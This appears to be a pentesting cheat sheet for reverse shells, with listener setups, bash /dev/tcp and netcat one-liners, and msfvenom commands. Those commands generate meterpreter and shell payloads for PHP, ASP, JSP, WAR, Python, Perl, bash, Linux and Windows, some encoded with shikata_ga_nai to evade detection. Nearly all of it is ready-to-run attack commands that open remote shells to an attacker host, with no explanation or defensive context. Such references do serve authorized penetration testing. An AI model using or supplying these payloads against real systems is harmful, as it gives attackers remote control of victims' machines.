reverse shell

# Listener
nv -lnvp 4444

# Victim
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
# Listener
nc -lnvp 4444

# Victim
nc -e /bin/bash 10.0.0.1 4444
# php
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw > shell.php

# Listener with Metasploit
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.0.0.1
set lport 4444
# asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f asp > shell.asp
# jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw > shell.jsp
# war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f war > shell.war
# python
msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=4444 -f raw > shell.py
# bash
msfvenom -p cmd/unix/reverse_bash LHOST=10.0.0.1 LPORT=4444 -f raw > shell.sh
# perl
msfvenom -p cmd/unix/reverse_perl LHOST=10.0.0.1 LPORT=4444 -f raw > shell.pl
# linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -b '\x00' -f python
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -b '\x00' EXITFUNC=thread -f python
# windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.11 LPORT=4444 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

results for ""

    No results matching ""